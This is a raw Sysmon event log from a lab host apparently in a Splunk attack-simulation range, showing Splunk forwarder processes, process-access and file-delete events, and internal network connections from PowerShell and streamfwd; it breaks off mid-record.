18:09:43.522{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084221Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:43.522{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4DE7-613A-3290-03000000C801}6428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084220Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:43.522{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4DE7-613A-3290-03000000C801}6428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084219Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:43.505{B81B27B7-4DE7-613A-3290-03000000C801}6428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084218Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:43.189{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC87F11F2A4CA6328C34588A75C4EFA5,SHA256=DE46C6230EB9F5FF3C0C62383C8025B1444A4596EDDD5528F013E5974696D434,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084250Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.925{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4DE8-613A-3490-03000000C801}332C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084249Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.923{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084248Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.923{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084247Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.923{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084246Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.923{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084245Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.923{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4DE8-613A-3490-03000000C801}332C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084244Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.923{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4DE8-613A-3490-03000000C801}332C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084243Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.904{B81B27B7-4DE8-613A-3490-03000000C801}332C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035084242Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:09.259{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56582-false10.0.1.12-8000- 354300x800000000000000035084241Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:08.807{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56581-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084240Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.572{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8FFCAAE64BB97DEDA984B96AE98373AD,SHA256=7E57476C991BF213D7E81DAE41615281DF838137287EAF36772034D931EC5A95,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084239Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.572{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B52E349A8AE58FCE1710482144C04E30,SHA256=C435CF38FFB761E109B681F1DF9FC131CF19AC0CB68959D501884F3413BA8B69,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084238Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.372{B81B27B7-4DE8-613A-3390-03000000C801}53446072C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035084237Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.288{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9092033435FE34743E45FEA4FD808ECB,SHA256=5D7BA1FA024305ACB2848735B4C4C715C2898953D04A0B656CDCD20C55CFAA3A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084236Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.225{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4DE8-613A-3390-03000000C801}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084235Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.223{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084234Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.223{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084233Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.222{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084232Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.222{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084231Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.222{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4DE8-613A-3390-03000000C801}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084230Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.222{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4DE8-613A-3390-03000000C801}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084229Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.204{B81B27B7-4DE8-613A-3390-03000000C801}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084251Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:45.303{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EB418F490A7FE1018C32373B7AA38D7,SHA256=6B85FABC5914BD15A64796E45E34E5CCB794053FA0452DF6DDFC0358D972A85C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084253Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:46.320{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1011A0660D316542ADF0E87E786CF9A9,SHA256=A47D5F0DD0877BD07D5E7BA9EF9A16BDB44FDEE6AE7357CFE19046014BFB94A1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084252Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:46.002{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8FFCAAE64BB97DEDA984B96AE98373AD,SHA256=7E57476C991BF213D7E81DAE41615281DF838137287EAF36772034D931EC5A95,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084254Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:47.369{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0741FA96815DCBAB43F75F07C73440EC,SHA256=BA9C8EC6A191E48AD7A5994F4496098D2006C2AE0B9C5F5DC4637929C9CD2075,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084256Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:48.817{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=384392557BDB8EDDACD5FE2222BCDC4C,SHA256=F73DE121FB5E3FF5D765037A50AA2E378FF3C72398E589206CB5E108B7B0F1C7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084255Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:48.383{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BC9C3F9F7A2C347B8676C3E661A4908,SHA256=F2B023D9E46CB445FEE3FFB26D6D77079DD1535E77A38FF1B311CF05FC2CB497,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084258Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:13.817{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56583-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084257Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:49.419{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20060033D2543074013FCE1DAA5FDC3B,SHA256=9FD6C04FAAB57B0DE11CBB206C25BE2D70BAE869788014C66DD6DF6240A2739B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084260Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:15.152{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program 